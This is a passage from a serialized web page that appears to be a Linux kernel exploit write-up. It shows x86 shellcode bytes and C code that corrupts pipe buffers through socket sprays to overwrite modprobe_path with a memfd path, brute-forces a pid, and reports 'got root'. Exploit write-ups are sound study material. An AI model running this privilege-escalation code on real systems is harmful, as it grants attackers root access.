948},{"style":348},[65949],{"type":30,"value":3440},{"type":24,"tag":301,"props":65951,"children":65952},{"style":359},[65953],{"type":30,"value":492},{"type":24,"tag":301,"props":65955,"children":65956},{"class":303,"line":495},[65957],{"type":24,"tag":301,"props":65958,"children":65959},{"emptyLinePlaceholder":16},[65960],{"type":30,"value":341},{"type":24,"tag":301,"props":65962,"children":65963},{"class":303,"line":504},[65964],{"type":24,"tag":301,"props":65965,"children":65966},{"style":1062},[65967],{"type":30,"value":65968}," // get-sig kernel_runtime_2\n",{"type":24,"tag":301,"props":65970,"children":65971},{"class":303,"line":512},[65972,65976,65980,65984,65988,65992,65996,66000,66004,66009,66013,66017,66021,66025,66029,66033],{"type":24,"tag":301,"props":65973,"children":65974},{"style":308},[65975],{"type":30,"value":453},{"type":24,"tag":301,"props":65977,"children":65978},{"style":359},[65979],{"type":30,"value":873},{"type":24,"tag":301,"props":65981,"children":65982},{"style":314},[65983],{"type":30,"value":65821},{"type":24,"tag":301,"props":65985,"children":65986},{"style":359},[65987],{"type":30,"value":65826},{"type":24,"tag":301,"props":65989,"children":65990},{"style":385},[65991],{"type":30,"value":11206},{"type":24,"tag":301,"props":65993,"children":65994},{"style":466},[65995],{"type":30,"value":65835},{"type":24,"tag":301,"props":65997,"children":65998},{"style":359},[65999],{"type":30,"value":377},{"type":24,"tag":301,"props":66001,"children":66002},{"style":329},[66003],{"type":30,"value":9408},{"type":24,"tag":301,"props":66005,"children":66006},{"style":9400},[66007],{"type":30,"value":66008},"\\xfc\\x0f\\x01\\x15",{"type":24,"tag":301,"props":66010,"children":66011},{"style":329},[66012],{"type":30,"value":9408},{"type":24,"tag":301,"props":66014,"children":66015},{"style":359},[66016],{"type":30,"value":377},{"type":24,"tag":301,"props":66018,"children":66019},{"style":466},[66020],{"type":30,"value":1761},{"type":24,"tag":301,"props":66022,"children":66023},{"style":359},[66024],{"type":30,"value":911},{"type":24,"tag":301,"props":66026,"children":66027},{"style":385},[66028],{"type":30,"value":607},{"type":24,"tag":301,"props":66030,"children":66031},{"style":466},[66032],{"type":30,"value":685},{"type":24,"tag":301,"props":66034,"children":66035},{"style":385},[66036],{"type":30,"value":59408},{"type":24,"tag":301,"props":66038,"children":66039},{"class":303,"line":592},[66040,66044,66048,66052,66057,66061,66065,66070,66074,66078,66083,66087,66091,66095],{"type":24,"tag":301,"props":66041,"children":66042},{"style":314},[66043],{"type":30,"value":65884},{"type":24,"tag":301,"props":66045,"children":66046},{"style":359},[66047],{"type":30,"value":65826},{"type":24,"tag":301,"props":66049,"children":66050},{"style":385},[66051],{"type":30,"value":11206},{"type":24,"tag":301,"props":66053,"children":66054},{"style":466},[66055],{"type":30,"value":66056}," 0x8",{"type":24,"tag":301,"props":66058,"children":66059},{"style":359},[66060],{"type":30,"value":377},{"type":24,"tag":301,"props":66062,"children":66063},{"style":329},[66064],{"type":30,"value":9408},{"type":24,"tag":301,"props":66066,"children":66067},{"style":9400},[66068],{"type":30,"value":66069},"\\xb8\\x10\\x00\\x00\\x00\\x8e\\xd8\\x8e\\xc0\\x8e\\xd0\\xbf",{"type":24,"tag":301,"props":66071,"children":66072},{"style":329},[66073],{"type":30,"value":9408},{"type":24,"tag":301,"props":66075,"children":66076},{"style":359},[66077],{"type":30,"value":377},{"type":24,"tag":301,"props":66079,"children":66080},{"style":466},[66081],{"type":30,"value":66082},"12",{"type":24,"tag":301,"props":66084,"children":66085},{"style":359},[66086],{"type":30,"value":911},{"type":24,"tag":301,"props":66088,"children":66089},{"style":385},[66090],{"type":30,"value":607},{"type":24,"tag":301,"props":66092,"children":66093},{"style":466},[66094],{"type":30,"value":685},{"type":24,"tag":301,"props":66096,"children":66097},{"style":385},[66098],{"type":30,"value":59408},{"type":24,"tag":301,"props":66100,"children":66101},{"class":303,"line":619},[66102,66106,66110,66114,66119,66123,66127,66132,66136,66140,66144,66148,66152,66156],{"type":24,"tag":301,"props":66103,"children":66104},{"style":314},[66105],{"type":30,"value":65884},{"type":24,"tag":301,"props":66107,"children":66108},{"style":359},[66109],{"type":30,"value":65826},{"type":24,"tag":301,"props":66111,"children":66112},{"style":385},[66113],{"type":30,"value":11206},{"type":24,"tag":301,"props":66115,"children":66116},{"style":466},[66117],{"type":30,"value":66118}," 0x18",{"type":24,"tag":301,"props":66120,"children":66121},{"style":359},[66122],{"type":30,"value":377},{"type":24,"tag":301,"props":66124,"children":66125},{"style":329},[66126],{"type":30,"value":9408},{"type":24,"tag":301,"props":66128,"children":66129},{"style":9400},[66130],{"type":30,"value":66131},"\\x89\\xde\\x8b\\x0d",{"type":24,"tag":301,"props":66133,"children":66134},{"style":329},[66135],{"type":30,"value":9408},{"type":24,"tag":301,"props":66137,"children":66138},{"style":359},[66139],{"type":30,"value":377},{"type":24,"tag":301,"props":66141,"children":66142},{"style":466},[66143],{"type":30,"value":1761},{"type":24,"tag":301,"props":66145,"children":66146},{"style":359},[66147],{"type":30,"value":911},{"type":24,"tag":301,"props":66149,"children":66150},{"style":385},[66151],{"type":30,"value":607},{"type":24,"tag":301,"props":66153,"children":66154},{"style":466},[66155],{"type":30,"value":685},{"type":24,"tag":301,"props":66157,"children":66158},{"style":385},[66159],{"type":30,"value":59408},{"type":24,"tag":301,"props":66161,"children":66162},{"class":303,"line":635},[66163,66167,66171,66175,66180,66184,66188,66193,66197,66201,66205,66209,66213,66217],{"type":24,"tag":301,"props":66164,"children":66165},{"style":314},[66166],{"type":30,"value":65884},{"type":24,"tag":301,"props":66168,"children":66169},{"style":359},[66170],{"type":30,"value":65826},{"type":24,"tag":301,"props":66172,"children":66173},{"style":385},[66174],{"type":30,"value":11206},{"type":24,"tag":301,"props":66176,"children":66177},{"style":466},[66178],{"type":30,"value":66179}," 0x20",{"type":24,"tag":301,"props":66181,"children":66182},{"style":359},[66183],{"type":30,"value":377},{"type":24,"tag":301,"props":66185,"children":66186},{"style":329},[66187],{"type":30,"value":9408},{"type":24,"tag":301,"props":66189,"children":66190},{"style":9400},[66191],{"type":30,"value":66192},"\\xc1\\xe9\\x02\\xf3\\xa5\\xbc",{"type":24,"tag":301,"props":66194,"children":66195},{"style":329},[66196],{"type":30,"value":9408},{"type":24,"tag":301,"props":66198,"children":66199},{"style":359},[66200],{"type":30,"value":377},{"type":24,"tag":301,"props":66202,"children":66203},{"style":466},[66204],{"type":30,"value":25198},{"type":24,"tag":301,"props":66206,"children":66207},{"style":359},[66208],{"type":30,"value":911},{"type":24,"tag":301,"props":66210,"children":66211},{"style":385},[66212],{"type":30,"value":607},{"type":24,"tag":301,"props":66214,"children":66215},{"style":466},[66216],{"type":30,"value":685},{"type":24,"tag":301,"props":66218,"children":66219},{"style":385},[66220],{"type":30,"value":59408},{"type":24,"tag":301,"props":66222,"children":66223},{"class":303,"line":643},[66224,66228,66232,66236,66241,66245,66249,66254,66258,66262,66267,66271,66275,66279],{"type":24,"tag":301,"props":66225,"children":66226},{"style":314},[66227],{"type":30,"value":65884},{"type":24,"tag":301,"props":66229,"children":66230},{"style":359},[66231],{"type":30,"value":65826},{"type":24,"tag":301,"props":66233,"children":66234},{"style":385},[66235],{"type":30,"value":11206},{"type":24,"tag":301,"props":66237,"children":66238},{"style":466},[66239],{"type":30,"value":66240}," 0x2a",{"type":24,"tag":301,"props":66242,"children":66243},{"style":359},[66244],{"type":30,"value":377},{"type":24,"tag":301,"props":66246,"children":66247},{"style":329},[66248],{"type":30,"value":9408},{"type":24,"tag":301,"props":66250,"children":66251},{"style":9400},[66252],{"type":30,"value":66253},"\\x0f\\x20\\xe0\\x83\\xc8\\x20\\x0f\\x22\\xe0\\xb9\\x80\\x00\\x00\\xc0\\x0f\\x32\\x0f\\xba\\xe8\\x08\\x0f\\x30\\xb8\\x00",{"type":24,"tag":301,"props":66255,"children":66256},{"style":329},[66257],{"type":30,"value":9408},{"type":24,"tag":301,"props":66259,"children":66260},{"style":359},[66261],{"type":30,"value":377},{"type":24,"tag":301,"props":66263,"children":66264},{"style":466},[66265],{"type":30,"value":66266},"24",{"type":24,"tag":301,"props":66268,"children":66269},{"style":359},[66270],{"type":30,"value":911},{"type":24,"tag":301,"props":66272,"children":66273},{"style":385},[66274],{"type":30,"value":607},{"type":24,"tag":301,"props":66276,"children":66277},{"style":466},[66278],{"type":30,"value":685},{"type":24,"tag":301,"props":66280,"children":66281},{"style":385},[66282],{"type":30,"value":59408},{"type":24,"tag":301,"props":66284,"children":66285},{"class":303,"line":652},[66286,66290,66294,66298,66303,66307,66311,66316,66320,66324,66329,66333,66337,66341],{"type":24,"tag":301,"props":66287,"children":66288},{"style":314},[66289],{"type":30,"value":65884},{"type":24,"tag":301,"props":66291,"children":66292},{"style":359},[66293],{"type":30,"value":65826},{"type":24,"tag":301,"props":66295,"children":66296},{"style":385},[66297],{"type":30,"value":11206},{"type":24,"tag":301,"props":66299,"children":66300},{"style":466},[66301],{"type":30,"value":66302}," 0x45",{"type":24,"tag":301,"props":66304,"children":66305},{"style":359},[66306],{"type":30,"value":377},{"type":24,"tag":301,"props":66308,"children":66309},{"style":329},[66310],{"type":30,"value":9408},{"type":24,"tag":301,"props":66312,"children":66313},{"style":9400},[66314],{"type":30,"value":66315},"\\x0f\\x22\\xd8\\xb8\\x01\\x00\\x00\\x80\\x0f\\x22\\xc0\\xea\\x57\\x00\\x00",{"type":24,"tag":301,"props":66317,"children":66318},{"style":329},[66319],{"type":30,"value":9408},{"type":24,"tag":301,"props":66321,"children":66322},{"style":359},[66323],{"type":30,"value":377},{"type":24,"tag":301,"props":66325,"children":66326},{"style":466},[66327],{"type":30,"value":66328},"15",{"type":24,"tag":301,"props":66330,"children":66331},{"style":359},[66332],{"type":30,"value":911},{"type":24,"tag":301,"props":66334,"children":66335},{"style":385},[66336],{"type":30,"value":607},{"type":24,"tag":301,"props":66338,"children":66339},{"style":466},[66340],{"type":30,"value":685},{"type":24,"tag":301,"props":66342,"children":66343},{"style":385},[66344],{"type":30,"value":59408},{"type":24,"tag":301,"props":66346,"children":66347},{"class":303,"line":666},[66348,66352,66356,66360,66365,66369,66373,66378,66382,66386,66390,66394,66398,66402],{"type":24,"tag":301,"props":66349,"children":66350},{"style":314},[66351],{"type":30,"value":65884},{"type":24,"tag":301,"props":66353,"children":66354},{"style":359},[66355],{"type":30,"value":65826},{"type":24,"tag":301,"props":66357,"children":66358},{"style":385},[66359],{"type":30,"value":11206},{"type":24,"tag":301,"props":66361,"children":66362},{"style":466},[66363],{"type":30,"value":66364}," 0x55",{"type":24,"tag":301,"props":66366,"children":66367},{"style":359},[66368],{"type":30,"value":377},{"type":24,"tag":301,"props":66370,"children":66371},{"style":329},[66372],{"type":30,"value":9408},{"type":24,"tag":301,"props":66374,"children":66375},{"style":9400},[66376],{"type":30,"value":66377},"\\x08\\x00\\xb9\\x01\\x01\\x00\\xc0\\xb8",{"type":24,"tag":301,"props":66379,"children":66380},{"style":329},[66381],{"type":30,"value":9408},{"type":24,"tag":301,"props":66383,"children":66384},{"style":359},[66385],{"type":30,"value":377},{"type":24,"tag":301,"props":66387,"children":66388},{"style":466},[66389],{"type":30,"value":10900},{"type":24,"tag":301,"props":66391,"children":66392},{"style":359},[66393],{"type":30,"value":911},{"type":24,"tag":301,"props":66395,"children":66396},{"style":385},[66397],{"type":30,"value":607},{"type":24,"tag":301,"props":66399,"children":66400},{"style":466},[66401],{"type":30,"value":685},{"type":24,"tag":301,"props":66403,"children":66404},{"style":385},[66405],{"type":30,"value":59408},{"type":24,"tag":301,"props":66407,"children":66408},{"class":303,"line":674},[66409,66413,66417,66421,66426,66430,66434,66439,66443,66447,66451,66455,66459,66463],{"type":24,"tag":301,"props":66410,"children":66411},{"style":314},[66412],{"type":30,"value":65884},{"type":24,"tag":301,"props":66414,"children":66415},{"style":359},[66416],{"type":30,"value":65826},{"type":24,"tag":301,"props":66418,"children":66419},{"style":385},[66420],{"type":30,"value":11206},{"type":24,"tag":301,"props":66422,"children":66423},{"style":466},[66424],{"type":30,"value":66425}," 0x61",{"type":24,"tag":301,"props":66427,"children":66428},{"style":359},[66429],{"type":30,"value":377},{"type":24,"tag":301,"props":66431,"children":66432},{"style":329},[66433],{"type":30,"value":9408},{"type":24,"tag":301,"props":66435,"children":66436},{"style":9400},[66437],{"type":30,"value":66438},"\\x31\\xd2\\x0f\\x30\\xe8",{"type":24,"tag":301,"props":66440,"children":66441},{"style":329},[66442],{"type":30,"value":9408},{"type":24,"tag":301,"props":66444,"children":66445},{"style":359},[66446],{"type":30,"value":377},{"type":24,"tag":301,"props":66448,"children":66449},{"style":466},[66450],{"type":30,"value":24886},{"type":24,"tag":301,"props":66452,"children":66453},{"style":359},[66454],{"type":30,"value":911},{"type":24,"tag":301,"props":66456,"children":66457},{"style":385},[66458],{"type":30,"value":607},{"type":24,"tag":301,"props":66460,"children":66461},{"style":466},[66462],{"type":30,"value":685},{"type":24,"tag":301,"props":66464,"children":66465},{"style":385},[66466],{"type":30,"value":59408},{"type":24,"tag":301,"props":66468,"children":66469},{"class":303,"line":692},[66470,66474,66478,66482,66487,66491,66495,66500,66504,66508,66512,66516,66520,66524],{"type":24,"tag":301,"props":66471,"children":66472},{"style":314},[66473],{"type":30,"value":65884},{"type":24,"tag":301,"props":66475,"children":66476},{"style":359},[66477],{"type":30,"value":65826},{"type":24,"tag":301,"props":66479,"children":66480},{"style":385},[66481],{"type":30,"value":11206},{"type":24,"tag":301,"props":66483,"children":66484},{"style":466},[66485],{"type":30,"value":66486}," 0x6a",{"type":24,"tag":301,"props":66488,"children":66489},{"style":359},[66490],{"type":30,"value":377},{"type":24,"tag":301,"props":66492,"children":66493},{"style":329},[66494],{"type":30,"value":9408},{"type":24,"tag":301,"props":66496,"children":66497},{"style":9400},[66498],{"type":30,"value":66499},"\\x48\\xc7\\xc6",{"type":24,"tag":301,"props":66501,"children":66502},{"style":329},[66503],{"type":30,"value":9408},{"type":24,"tag":301,"props":66505,"children":66506},{"style":359},[66507],{"type":30,"value":377},{"type":24,"tag":301,"props":66509,"children":66510},{"style":466},[66511],{"type":30,"value":1447},{"type":24,"tag":301,"props":66513,"children":66514},{"style":359},[66515],{"type":30,"value":911},{"type":24,"tag":301,"props":66517,"children":66518},{"style":385},[66519],{"type":30,"value":607},{"type":24,"tag":301,"props":66521,"children":66522},{"style":466},[66523],{"type":30,"value":685},{"type":24,"tag":301,"props":66525,"children":66526},{"style":385},[66527],{"type":30,"value":59408},{"type":24,"tag":301,"props":66529,"children":66530},{"class":303,"line":3631},[66531,66535,66539,66543,66548,66552,66556,66561,66565,66569,66573,66577,66581,66585],{"type":24,"tag":301,"props":66532,"children":66533},{"style":314},[66534],{"type":30,"value":65884},{"type":24,"tag":301,"props":66536,"children":66537},{"style":359},[66538],{"type":30,"value":65826},{"type":24,"tag":301,"props":66540,"children":66541},{"style":385},[66542],{"type":30,"value":11206},{"type":24,"tag":301,"props":66544,"children":66545},{"style":466},[66546],{"type":30,"value":66547}," 0x71",{"type":24,"tag":301,"props":66549,"children":66550},{"style":359},[66551],{"type":30,"value":377},{"type":24,"tag":301,"props":66553,"children":66554},{"style":329},[66555],{"type":30,"value":9408},{"type":24,"tag":301,"props":66557,"children":66558},{"style":9400},[66559],{"type":30,"value":66560},"\\x48\\xc7\\xc0\\x80\\x00\\x00",{"type":24,"tag":301,"props":66562,"children":66563},{"style":329},[66564],{"type":30,"value":9408},{"type":24,"tag":301,"props":66566,"children":66567},{"style":359},[66568],{"type":30,"value":377},{"type":24,"tag":301,"props":66570,"children":66571},{"style":466},[66572],{"type":30,"value":25198},{"type":24,"tag":301,"props":66574,"children":66575},{"style":359},[66576],{"type":30,"value":911},{"type":24,"tag":301,"props":66578,"children":66579},{"style":385},[66580],{"type":30,"value":607},{"type":24,"tag":301,"props":66582,"children":66583},{"style":466},[66584],{"type":30,"value":685},{"type":24,"tag":301,"props":66586,"children":66587},{"style":385},[66588],{"type":30,"value":59408},{"type":24,"tag":301,"props":66590,"children":66591},{"class":303,"line":3639},[66592,66596,66600,66604,66609,66613,66617,66622,66626,66630,66634,66638,66642,66646],{"type":24,"tag":301,"props":66593,"children":66594},{"style":314},[66595],{"type":30,"value":65884},{"type":24,"tag":301,"props":66597,"children":66598},{"style":359},[66599],{"type":30,"value":65826},{"type":24,"tag":301,"props":66601,"children":66602},{"style":385},[66603],{"type":30,"value":11206},{"type":24,"tag":301,"props":66605,"children":66606},{"style":466},[66607],{"type":30,"value":66608}," 0x78",{"type":24,"tag":301,"props":66610,"children":66611},{"style":359},[66612],{"type":30,"value":377},{"type":24,"tag":301,"props":66614,"children":66615},{"style":329},[66616],{"type":30,"value":9408},{"type":24,"tag":301,"props":66618,"children":66619},{"style":9400},[66620],{"type":30,"value":66621},"\\xff\\xe0",{"type":24,"tag":301,"props":66623,"children":66624},{"style":329},[66625],{"type":30,"value":9408},{"type":24,"tag":301,"props":66627,"children":66628},{"style":359},[66629],{"type":30,"value":377},{"type":24,"tag":301,"props":66631,"children":66632},{"style":466},[66633],{"type":30,"value":1503},{"type":24,"tag":301,"props":66635,"children":66636},{"style":359},[66637],{"type":30,"value":911},{"type":24,"tag":301,"props":66639,"children":66640},{"style":385},[66641],{"type":30,"value":607},{"type":24,"tag":301,"props":66643,"children":66644},{"style":466},[66645],{"type":30,"value":685},{"type":24,"tag":301,"props":66647,"children":66648},{"style":359},[66649],{"type":30,"value":791},{"type":24,"tag":301,"props":66651,"children":66652},{"class":303,"line":3647},[66653,66657,66661],{"type":24,"tag":301,"props":66654,"children":66655},{"style":308},[66656],{"type":30,"value":482},{"type":24,"tag":301,"props":66658,"children":66659},{"style":348},[66660],{"type":30,"value":3440},{"type":24,"tag":301,"props":66662,"children":66663},{"style":359},[66664],{"type":30,"value":492},{"type":24,"tag":301,"props":66666,"children":66667},{"class":303,"line":3685},[66668],{"type":24,"tag":301,"props":66669,"children":66670},{"emptyLinePlaceholder":16},[66671],{"type":30,"value":341},{"type":24,"tag":301,"props":66673,"children":66674},{"class":303,"line":3713},[66675,66679,66683],{"type":24,"tag":301,"props":66676,"children":66677},{"style":308},[66678],{"type":30,"value":680},{"type":24,"tag":301,"props":66680,"children":66681},{"style":348},[66682],{"type":30,"value":3613},{"type":24,"tag":301,"props":66684,"children":66685},{"style":359},[66686],{"type":30,"value":492},{"type":24,"tag":301,"props":66688,"children":66689},{"class":303,"line":3721},[66690],{"type":24,"tag":301,"props":66691,"children":66692},{"style":359},[66693],{"type":30,"value":698},{"type":24,"tag":301,"props":66695,"children":66696},{"class":303,"line":3751},[66697],{"type":24,"tag":301,"props":66698,"children":66699},{"style":359},[66700],{"type":30,"value":17123},{"type":24,"tag":80,"props":66702,"children":66704},{"id":66703},"overwriting-modprobe_path",[66705,66707],{"type":30,"value":66706},"Overwriting ",{"type":24,"tag":145,"props":66708,"children":66710},{"className":66709},[],[66711],{"type":30,"value":65093},{"type":24,"tag":32,"props":66713,"children":66714},{},[66715,66717,66723],{"type":30,"value":66716},"Finding the ",{"type":24,"tag":145,"props":66718,"children":66720},{"className":66719},[],[66721],{"type":30,"value":66722},"/sbin/modprobe",{"type":30,"value":66724}," string in kernel memory and replacing it with a controlled value that points to a file we own finally becomes relatively trivial.",{"type":24,"tag":32,"props":66726,"children":66727},{},[66728,66730,66736],{"type":30,"value":66729},"A very well-known trick for this to work, although we are running in a chroot without being able to create files at the root filesystem, is using a memfd exposed through ",{"type":24,"tag":145,"props":66731,"children":66733},{"className":66732},[],[66734],{"type":30,"value":66735},"/proc/\u003Cpid>/fd/\u003Cn>.",{"type":30,"value":66737}," It's worth adding that, given that our pid outside the unprivileged namespace is unknown to us, we brute-force it.",{"type":24,"tag":291,"props":66739,"children":66741},{"className":35866,"code":66740,"language":35868,"meta":7,"style":7},"[...]\n puts(\"[*] overwrite modprobe_path\");\n for (int i = 0; i \u003C 4194304; i++)\n {\n pipebuf->page = modprobe_page;\n pipebuf->offset = modprobe_off;\n pipebuf->len = 0;\n for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n {\n if (write(sock[i][0], pipebuf, 1024 - 320) \u003C 0)\n {\n perror(\"[-] write(socket)\");\n break;\n }\n }\n\n memset(&data, 0, PAGE_SIZE);\n snprintf(fd_path, sizeof(fd_path), \"/proc/%i/fd/%i\", i, modprobe_fd);\n\n lseek(modprobe_fd, 0, SEEK_SET);\n dprintf(modprobe_fd, MODPROBE_SCRIPT, i, status_fd, i, stdin_fd, i, stdout_fd);\n\n if (write(pfd[pipe_idx][1], fd_path, 32) \u003C 0)\n {\n perror(\"\\n[-] write(pipe)\");\n }\n\n if (check_modprobe(fd_path))\n {\n puts(\"[-] failed to overwrite modprobe\");\n break;\n }\n\n if (trigger_modprobe(status_fd))\n {\n puts(\"\\n[+] got root\");\n goto out;\n }\n\n for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n {\n if (read(sock[i][1], leak, 1024 - 320) \u003C 0)\n {\n perror(\"[-] read(socket)\");\n return -1;\n }\n }\n }\n puts(\"[-] fake modprobe failed\");\n[...]\n",[66742],{"type":24,"tag":145,"props":66743,"children":66744},{"__ignoreMap":7},[66745,66752,66774,66782,66789,66797,66805,66813,66821,66828,66836,66843,66881,66892,66899,66906,66913,66940,66971,66978,67000,67013,67020,67078,67085,67113,67120,67127,67148,67155,67176,67187,67194,67201,67222,67229,67257,67270,67277,67284,67332,67339,67406,67413,67434,67454,67461,67468,67475,67495],{"type":24,"tag":301,"props":66746,"children":66747},{"class":303,"line":304},[66748],{"type":24,"tag":301,"props":66749,"children":66750},{"style":359},[66751],{"type":30,"value":17123},{"type":24,"tag":301,"props":66753,"children":66754},{"class":303,"line":320},[66755,66760,66765,66770],{"type":24,"tag":301,"props":66756,"children":66757},{"style":359},[66758],{"type":30,"value":66759}," puts(\"[*] ",{"type":24,"tag":301,"props":66761,"children":66762},{"style":10246},[66763],{"type":30,"value":66764},"overwrite",{"type":24,"tag":301,"props":66766,"children":66767},{"style":10246},[66768],{"type":30,"value":66769}," modprobe_path",{"type":24,"tag":301,"props":66771,"children":66772},{"style":329},[66773],{"type":30,"value":63011},{"type":24,"tag":301,"props":66775,"children":66776},{"class":303,"line":335},[66777],{"type":24,"tag":301,"props":66778,"children":66779},{"style":329},[66780],{"type":30,"value":66781}," for (int i = 0; i \u003C 4194304; i++)\n",{"type":24,"tag":301,"props":66783,"children":66784},{"class":303,"line":344},[66785],{"type":24,"tag":301,"props":66786,"children":66787},{"style":329},[66788],{"type":30,"value":35943},{"type":24,"tag":301,"props":66790,"children":66791},{"class":303,"line":401},[66792],{"type":24,"tag":301,"props":66793,"children":66794},{"style":329},[66795],{"type":30,"value":66796}," pipebuf->page = modprobe_page;\n",{"type":24,"tag":301,"props":66798,"children":66799},{"class":303,"line":415},[66800],{"type":24,"tag":301,"props":66801,"children":66802},{"style":329},[66803],{"type":30,"value":66804}," pipebuf->offset = modprobe_off;\n",{"type":24,"tag":301,"props":66806,"children":66807},{"class":303,"line":439},[66808],{"type":24,"tag":301,"props":66809,"children":66810},{"style":329},[66811],{"type":30,"value":66812}," pipebuf->len = 0;\n",{"type":24,"tag":301,"props":66814,"children":66815},{"class":303,"line":447},[66816],{"type":24,"tag":301,"props":66817,"children":66818},{"style":329},[66819],{"type":30,"value":66820}," for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n",{"type":24,"tag":301,"props":66822,"children":66823},{"class":303,"line":476},[66824],{"type":24,"tag":301,"props":66825,"children":66826},{"style":329},[66827],{"type":30,"value":38411},{"type":24,"tag":301,"props":66829,"children":66830},{"class":303,"line":495},[66831],{"type":24,"tag":301,"props":66832,"children":66833},{"style":329},[66834],{"type":30,"value":66835}," if (write(sock[i][0], pipebuf, 1024 - 320) \u003C 0)\n",{"type":24,"tag":301,"props":66837,"children":66838},{"class":303,"line":504},[66839],{"type":24,"tag":301,"props":66840,"children":66841},{"style":329},[66842],{"type":30,"value":38447},{"type":24,"tag":301,"props":66844,"children":66845},{"class":303,"line":512},[66846,66851,66855,66859,66863,66868,66872,66876],{"type":24,"tag":301,"props":66847,"children":66848},{"style":329},[66849],{"type":30,"value":66850}," perror(\"",{"type":24,"tag":301,"props":66852,"children":66853},{"style":359},[66854],{"type":30,"value":541},{"type":24,"tag":301,"props":66856,"children":66857},{"style":385},[66858],{"type":30,"value":9253},{"type":24,"tag":301,"props":66860,"children":66861},{"style":359},[66862],{"type":30,"value":1046},{"type":24,"tag":301,"props":66864,"children":66865},{"style":10246},[66866],{"type":30,"value":66867},"write",{"type":24,"tag":301,"props":66869,"children":66870},{"style":359},[66871],{"type":30,"value":362},{"type":24,"tag":301,"props":66873,"children":66874},{"style":10246},[66875],{"type":30,"value":48674},{"type":24,"tag":301,"props":66877,"children":66878},{"style":359},[66879],{"type":30,"value":66880},")\");\n",{"type":24,"tag":301,"props":66882,"children":66883},{"class":303,"line":592},[66884,66888],{"type":24,"tag":301,"props":66885,"children":66886},{"style":308},[66887],{"type":30,"value":65675},{"type":24,"tag":301,"props":66889,"children":66890},{"style":359},[66891],{"type":30,"value":492},{"type":24,"tag":301,"props":66893,"children":66894},{"class":303,"line":619},[66895],{"type":24,"tag":301,"props":66896,"children":66897},{"style":359},[66898],{"type":30,"value":65600},{"type":24,"tag":301,"props":66900,"children":66901},{"class":303,"line":635},[66902],{"type":24,"tag":301,"props":66903,"children":66904},{"style":359},[66905],{"type":30,"value":3345},{"type":24,"tag":301,"props":66907,"children":66908},{"class":303,"line":643},[66909],{"type":24,"tag":301,"props":66910,"children":66911},{"emptyLinePlaceholder":16},[66912],{"type":30,"value":341},{"type":24,"tag":301,"props":66914,"children":66915},{"class":303,"line":652},[66916,66920,66924,66928,66932,66936],{"type":24,"tag":301,"props":66917,"children":66918},{"style":314},[66919],{"type":30,"value":61339},{"type":24,"tag":301,"props":66921,"children":66922},{"style":359},[66923],{"type":30,"value":362},{"type":24,"tag":301,"props":66925,"children":66926},{"style":385},[66927],{"type":30,"value":556},{"type":24,"tag":301,"props":66929,"children":66930},{"style":359},[66931],{"type":30,"value":65486},{"type":24,"tag":301,"props":66933,"children":66934},{"style":466},[66935],{"type":30,"value":584},{"type":24,"tag":301,"props":66937,"children":66938},{"style":359},[66939],{"type":30,"value":65495},{"type":24,"tag":301,"props":66941,"children":66942},{"class":303,"line":666},[66943,66947,66952,66956,66961,66966],{"type":24,"tag":301,"props":66944,"children":66945},{"style":314},[66946],{"type":30,"value":62040},{"type":24,"tag":301,"props":66948,"children":66949},{"style":359},[66950],{"type":30,"value":66951},"(fd_path, ",{"type":24,"tag":301,"props":66953,"children":66954},{"style":348},[66955],{"type":30,"value":62050},{"type":24,"tag":301,"props":66957,"children":66958},{"style":359},[66959],{"type":30,"value":66960},"(fd_path), ",{"type":24,"tag":301,"props":66962,"children":66963},{"style":329},[66964],{"type":30,"value":66965},"\"/proc/%i/fd/%i\"",{"type":24,"tag":301,"props":66967,"children":66968},{"style":359},[66969],{"type":30,"value":66970},", i, modprobe_fd);\n",{"type":24,"tag":301,"props":66972,"children":66973},{"class":303,"line":674},[66974],{"type":24,"tag":301,"props":66975,"children":66976},{"emptyLinePlaceholder":16},[66977],{"type":30,"value":341},{"type":24,"tag":301,"props":66979,"children":66980},{"class":303,"line":692},[66981,66986,66991,66995],{"type":24,"tag":301,"props":66982,"children":66983},{"style":314},[66984],{"type":30,"value":66985}," lseek",{"type":24,"tag":301,"props":66987,"children":66988},{"style":359},[66989],{"type":30,"value":66990},"(modprobe_fd, ",{"type":24,"tag":301,"props":66992,"children":66993},{"style":466},[66994],{"type":30,"value":584},{"type":24,"tag":301,"props":66996,"children":66997},{"style":359},[66998],{"type":30,"value":66999},", SEEK_SET);\n",{"type":24,"tag":301,"props":67001,"children":67002},{"class":303,"line":3631},[67003,67008],{"type":24,"tag":301,"props":67004,"children":67005},{"style":314},[67006],{"type":30,"value":67007}," dprintf",{"type":24,"tag":301,"props":67009,"children":67010},{"style":359},[67011],{"type":30,"value":67012},"(modprobe_fd, MODPROBE_SCRIPT, i, status_fd, i, stdin_fd, i, stdout_fd);\n",{"type":24,"tag":301,"props":67014,"children":67015},{"class":303,"line":3639},[67016],{"type":24,"tag":301,"props":67017,"children":67018},{"emptyLinePlaceholder":16},[67019],{"type":30,"value":341},{"type":24,"tag":301,"props":67021,"children":67022},{"class":303,"line":3647},[67023,67027,67031,67035,67039,67043,67048,67052,67057,67062,67066,67070,67074],{"type":24,"tag":301,"props":67024,"children":67025},{"style":308},[67026],{"type":30,"value":3285},{"type":24,"tag":301,"props":67028,"children":67029},{"style":359},[67030],{"type":30,"value":873},{"type":24,"tag":301,"props":67032,"children":67033},{"style":314},[67034],{"type":30,"value":66867},{"type":24,"tag":301,"props":67036,"children":67037},{"style":359},[67038],{"type":30,"value":362},{"type":24,"tag":301,"props":67040,"children":67041},{"style":369},[67042],{"type":30,"value":65539},{"type":24,"tag":301,"props":67044,"children":67045},{"style":359},[67046],{"type":30,"value":67047},"[pipe_idx][",{"type":24,"tag":301,"props":67049,"children":67050},{"style":466},[67051],{"type":30,"value":546},{"type":24,"tag":301,"props":67053,"children":67054},{"style":359},[67055],{"type":30,"value":67056},"], fd_path, 